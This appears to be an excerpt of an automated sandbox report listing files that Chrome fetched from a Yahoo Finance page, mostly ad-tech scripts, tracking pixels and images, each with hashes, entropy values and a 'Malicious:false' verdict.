                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/prebid/prebid-2.0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/* prebid.js v8.51.0.Updated: 2024-10-04.Build: 2.0.33.Modules: consentManagement, consentManagementGpp, consentManagementUsp, criteoBidAdapter, enrichmentFpdModule, gdprEnforcement, gppControl_usnat, gppControl_usstates, gptPreAuction, ixBidAdapter, liveIntentIdSystem, medianetBidAdapter, openxBidAdapter, prebidServerBidAdapter, priceFloors, pubmaticBidAdapter, rtdModule, rubiconBidAdapter, taboolaBidAdapter, tripleliftBidAdapter, ttdBidAdapter, userId, yahooAnalyticsAdapter, yahooPrebidServer, yahooRtdProvider, yahoosspBidAdapter, yieldmoBidAdapter, identityLinkIdSystem, pairIdSystem */.if(window.pbjs&&window.pbjs.libLoaded)try{window.pbjs.getConfig("debug")&&console.warn("Attempted to load a copy of Prebid.js that clashes with the existing 'pbjs' instance. Load aborted.")}catch(e){}else (function(){.(()=>{var r,t={5649:(r,t,e)=>{function n(r,t,e,n,o){for(t=t.split?t.split("."):t,n=0;n<t.length;n++)r=r?r[t[n]]:o;return r===o?e:r}e.d(t,{A:()=>n})},5920:r=>{./*.* @license MIT.* Fun Hoo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.869825508972723
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:s6NYNMtKw9coJZl67k7XeeBgBdqzYC1MR/xRpn3VNy5bVil/PmiLQJfbH:BYNg797JMIXeeuXqzYh3/yviFPmiLcbH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:30C27C2AE036D942104E83A7ABB72537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:871101938BEC0BFC40A0EF657F03C073EBF6D5B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:65042A8C3677B43F22E6CB678881E0FC1F5DE509BA4DA21BEB91A84749483D0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B6059346422CD2F52116BDE81554F59F5EA219B9026277577F9C62095949C1F306F70C96138576E5D21B6689CF1DDCC266DC08B28C31ACEF590CA6281C18183C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/r8TW9c47hyxw22EECsC9Qw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/3e3ed6c0-859d-11ef-b251-e700ef1e3219.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.3..WEBPVP8X.... ...c.....ICCPH......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/crum?cm_dsp_id=45&external_user_id=CAESELrGnv9wPdIMioBkUGrT1WE&google_cver=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.840373865389457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:iATi9o4RcnM42BKHqSPPxqu2gOnooH8oJB:iATiG4GnMpKKSnxKg7oH8oz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DE7112F39C6623341A6F2E9D89AB31E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA9DD8E57B43B4F0E041A86FDCAE6F9D93DB1A7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDC134F6755B95CFA468AEBE1528788A4CB82AF807A7E887AD88C986E5A3F770
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2E9F9FF3BCB43C1A828A13CE4E8AE0D42152A1A3B6FD18EB6DCB6BFA8F20AFF6A088C252580D9396AD95BA018A2552200F9FC30670254CF68030AE3021CC7367
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.ZK.TE......i..$#A!`.."...`b..0.h\.Hditc.;1..,.q.'D..5......!..a......x.S}..&r......}..n...9u..(U.&.a.l.!....6...`.l.!....6...`.l.!....6...`.l.!... ..g.NQt...F.T..W.).:K.>E.j.>[..Sc,}#Og.L....[...9.}*..4X+R..g.."...*.".He.e.)2)3..Y.o.xk.t..+....0p(...=6H...a.R .1O.g.R.JG...\.R.)G..#OcWg..(..7....c.J.u......Y:A....{O...T& ......,e...-.im..Uv.E.F...............i`..Y&.qe"...$=..xN.1......,...*...X...$..d`uk.f.40.)...b.>&..:.....t...(.G>~....;t...J......xJ.^..[..t. 1a+....._-S..._&...Q!EH.w6.#W.h.z.....2....#.....v.<.\XD.h.... .z..`.9_&.].$..qc..L......a..@.:G..B.r...L@..>....<.D.......@N.|...mu..9~ ..L}...-........q....@Y..0Y%. "..#;+......y.{/..a..G/KR.j.. ..HP\.J.v.qQ..c.r....9.8...$Ol{j.-'...z.y.-..5Vr..`. ._-./{...s..0.....S.R.....>#..e......O..%!R5....4.d...*.lfqH`.......z.q~....oF....I.[G69=....A.5............^..c.VJ.=.?.........~[;....)ns.r.yYq..8aJ.`...p.6va.......f..@..m.c.......$..i.l..i-.=4.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (5503), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5503
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.376984635806113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:TeUg4KTMgKq8NGOzZZQujpcM8pmB9Q0C3MzDCprDVQ1nGXuX8Avva+b/70ApZV:6Ug4KTyNl/Qm3cy9SMHCpqp86a+joej
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:19720D3A285ABA8024B11FC9955795FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8E174FF6003772BC71FFAF2B655E23FC4B8794CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:00A54A79B12A7E6DC344AE20DEA91F7772A088C14CF9B12D4DD8CEFF8B374C11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B296C7311263B3B153353904B0D65131ED72F70F9A646795C07CE8DD3735329A6D6AAD99BD1C0F74742FC9E515D7CA1E78F44377EBBA55018331A986C93481A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://opus.analytics.yahoo.com/tag/opus-frame.html?referrer=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&tbla_id=2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9&axids=gam%3Dy-d5tzQeFE2uJXDidStQE4wZoQ.H.eGImJ~A%26dv360%3DeS1pQmgwX2JaRTJ1RlFaREx0MTNqSnNzTlhSLnByMEhoWX5B%26ydsp%3Dy-Fo7BG.NE2uI.n0VEzpLI4eXGFWLW1tuN~A%26tbla%3Dy-qtrPZiVE2uIQRuIKfGsUX0FoUhF18Gth~A&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN&reset_idsync=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width,initial-scale=1"><script defer="defer">(()=>{"use strict";var t=function(t){if(t)return t;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(t){return""}};const e=function(e,n,r,o){(o||window.document).cookie="".concat(e,"=").concat(n,";Max-Age=").concat(31536e3,";Domain=").concat(t(r),";path=/;Secure;SameSite=None")},n=function(t){return new URLSearchParams(document.location.search.slice(1)).get(t)||""};var r,o=function(){var t=new Date("January 1, 2011 00:00:00 GMT").getTime()/1e3,e=(new Date).getTime()/1e3;return parseInt((e-t)/60/60,10)};!function(t){if(r&&!t)return r;var e=function(t){return parseInt(t,36)};r={};var n=function(t,e){for(var n="".concat(t,"="),r=(e||window.document).cookie.split(";"),o=0;o<r.length;o++){var a=(r[o]||"").trim();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=conversant&uid=AQAJ_B_K7oK2IAJkaojMAQEBAQEBAQCTbI8MxAEBAJNsjwzE&expiration=1728501279&gpp_sid=&gpp=&is_secure=true&gdpr_consent=&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://dt.adsafeprotected.com/dt?advEntityId=2233400&asId=38c6b108-4dfa-76fb-59d4-d5cea654b422&tv=%7Bc:qyx4Av,pingTime:-3,time:262,type:v,sca:%7Blts:2024-10-08%2015.15.31%7D,clog:%5B%7Bpiv:0,vs:o,r:r,w:728,h:90,t:111%7D%5D,es:0,sc:1,ha:1,fgad:1,fif:0,gmnp:0,for:0,b11:0,cnod:1,gm:0,slTimes:%7Bi:0,o:262,n:0,pp:0,pm:0%7D,slEvents:%5B%7Bsl:o,t:111,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:0,obst:0,th:0,reas:r,bkn:%7Bpiv:%5B219~0%5D,as:%5B219~728.90%5D%7D%7D%5D,slEventCount:1,em:true,fr:false,e:,tt:rjss,dtt:0,fm:uqDOUlz+11%7C12%7C13%7C14%7C151%7C16%7C1711%7C1712%7C1713%7C1714%7C1715%7C1716%7C1717%7C1718%7C1719%7C171a%7C171b%7C171c%7C171d%7C171e%7C171f%7C171g%7C171h%7C171i%7C171j%7C171k%7C172%7C1731%7C1732%7C18%7C19%7C1a1%7C1a2%7C1a3%7C1a4%7C1a5%7C1a6%7C1b%7C1c%7C1d%7C1e%7C1f%7C1g11%7C1g12%7C1g2%7C1h%7C1i%7C1j%7C1k%7C1l1%7C1m%7C1n%7C1o%7C1p%7C1q%7C1r*.2233400-82744863%7C1r1,idMap:1r*,rmeas:1,rend:0,renddet:svg.us,siq:121%7D&br=c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1411)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.325416954924045
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:bNILfPOPCxW74s3VR/fAe3i+WdQxybVHsZkkzGp1S6fD7ZfAbJssngjbxBFS4sW:bN4fGsq3VRnAe3i+WuxQpayH77yus4Pd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:06DB46AD67C17DBB84A850A26B8BF73F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DE1616F58D1111283FABDB74FEC47008A6FAEF2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DC560454536BDB2A940BA35DB87DB1D5E9D192E5131412AB3498EE299D72C648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4D46FF24D90ECCD648E2E803E7750FD6F4F41C895A1C0E4CB4905E1E1F296C4719FF44514E38E8A78A49A9B3A3E0301A9AC2B56FA7099C098D80BEF956E14847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d as Q}from"./commonUtil.CI22_Irn.js";import{l as d,f as w}from"./logUtil.hOue7iAU.js";const g=30;async function k(c,{symbols:r,fields:n,silent:f=!1,imgLabels:S="logoUrl",imgHeights:q="50",imgWidths:A="50"}){if(!r||!n){const e=new Error("Bad request for loadQuote");return d(c,{fields:n,silent:f,symbols:r},{data:e,perfLabel:"loadQuote"}),Promise.reject(e)}const[y]=await Q(["quote"],c),s=[],h=[],b=Array.isArray(r)?Array.from(new Set(r)):[r],l={};for(const e of b){const o=y.getQuote(e);if(o){const m={fromCurrency:!0,fromExchange:!0,headSymbolAsString:!0,toCurrency:!0,toExchange:!0,ticker:!0,sparkline:!0,underlyingExchangeSymbol:!0,underlyingSymbol:!0},p=n.filter(u=>!m[u]&&!o[u]);if(h.push(...p),p.length===0){l[e]=o;continue}}else h.push(...n);s.push(e)}if(s.length===0)return l;try{const e=Array.from(new Set(h)).join(","),o=[],m=Math.ceil(s.length/g);for(let t=0;t<m;t++){const a=Math.min((t+1)*g,s.length),i=s.slice(t*g,a);o.push(w(c,{crumb:!0,pathname:"/v7/finance/quote",perfLabel:"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1620)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.329855816477348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:c81aOTRVh9ThTT8LT7LbSZNW5EqxPlg58JeS6pOYnN8LiKkknE1DXRksI0fS5:rMOTnJ8zHVEqxPC58QS6pxBK7nElRksm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D969B0F81242D36A88FA5922140249E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:404E22A5E111FA02CFB626D45B201E598B425FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7619B789D24BE9FCDC5B3A1DB864CA3B8194FA054D5881EEEA7F0D0F8A171705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C5CF9A3BC9170A9548DC8E36D349D2F751A3238177C60907F54720BF5F94736634DB4A1C12839F5EE5D0D2654F36F4CA87294ADD62CEDEA8709C203A832F61C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/vzm/cs_1.6.6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var c=window,t=c.document,e="*null",s=[1,9,10];function n(t,e,s,n){if(!t||!e||"function"!=typeof c[t])return n();try{c[t](e,s,(function(c,t){n(c,t)}))}catch(c){n()}}c.COMSCORE={_version:"1.6.6",beacon:function(r){n("__uspapi","getDoNotSell",1,(function(p,f){n("__tcfapi","getTCData",2,(function(n,o){var i=JSON.parse(JSON.stringify(r||{})),_=n&&n.gdprApplies||!1,a=c.YAHOO&&c.YAHOO.comscore||{},d=c.rapidInstance&&c.rapidInstance.getRapidAttribute;if(i.c1=i.c1||"2",i.c2=i.c2||a.c2||"7241469",i.c5=i.c5||d&&d("spaceid"),i.c7=i.c7||t.location.href,i.c8=i.c8||t.title||"",i.c9=i.c9||t.referrer||"",i.c14=i.c14||a.c14||"-1",i.gdpr=_?1:0,i.gdpr_consent="",_){if(o&&n){var u=s.every((c=>!0===n.purpose.consents[c])),l=!0===n.vendor.consents[77];i.cs_ucfr=u&&l?1:u&&l?"":0,i.gdpr_consent=n.tcString||""}}else f&&p&&"boolean"==typeof p.doNotSell?i.cs_ucfr=p.doNotSell?0:1:i.cs_ucfr=0;var g=i.cs_fpid||a.cs_fpid;if(g)if(i.cs_ucfr){var m=i.cs_fpdm||a.cs_fpdm;m&&m!==e?(i.cs_fpdm=m,i.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1058)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1059
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1109409484305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:DOd1kGZRWAWJq2qFeR0MANmvtssvujjSYWeYmL4Na2Gev:k1Vwj9Rc7s4jUeJ4NbGw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:37ADF3441948B71BD7589823F7BCD0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D99AA0426A06385C92F81D69030FA61CE9B2B966
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1B4C8ECE36EC68266F8B7EC948AEB5A1766CC29D444B47C328B95F89A2482F0F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C91C9721CF49C72CFFDD7B745FC7328650F3111191A2115DA6CB03790ED6C1F9B5A2DAFDFB6B8A33B3CAE5C79CD7F6EACC7EF3FEFC9CE41A068FB0C41D796029
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const v="modulepreload",y=function(a,l){return new URL(a,l).href},d={},w=function(l,c,u){let f=Promise.resolve();if(c&&c.length>0){const r=document.getElementsByTagName("link"),e=document.querySelector("meta[property=csp-nonce]"),h=(e==null?void 0:e.nonce)||(e==null?void 0:e.getAttribute("nonce"));f=Promise.all(c.map(t=>{if(t=y(t,u),t in d)return;d[t]=!0;const s=t.endsWith(".css"),m=s?'[rel="stylesheet"]':"";if(!!u)for(let o=r.length-1;o>=0;o--){const i=r[o];if(i.href===t&&(!s||i.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${m}`))return;const n=document.createElement("link");if(n.rel=s?"stylesheet":v,s||(n.as="script",n.crossOrigin=""),n.href=t,h&&n.setAttribute("nonce",h),document.head.appendChild(n),s)return new Promise((o,i)=>{n.addEventListener("load",o),n.addEventListener("error",()=>i(new Error(`Unable to preload CSS for ${t}`)))})}))}return f.then(()=>l()).catch(r=>{const e=new Event("vite:preloadError",{cancelable:!0});if(e.payload=r,window.dispa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):163190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.76969253065148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:T2HdALSWdG78KI4NBT0pfXle5jWlYoRl96678fGe:qHdALSAG78KI4NBT0L4jWlYoL9N78fGe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2F7F33FEF2FD82D96DB26D6BC9A01C9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:85BE1FA348024A920D92C2F5E163A5DEE8A4F0A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ADBAE70C25CD96D093A17357899A86D74B1A5BE1FC635FCBD0B5E46B8CBB1942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AABA4BBCCAC77D332F2E7B19A0ACE299B733C9A899598C2232CE19357E9F317C8A56796298198ACADE475A26EDA6D40FBF3961A701737ED33BA5CBDE8B2E3A9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
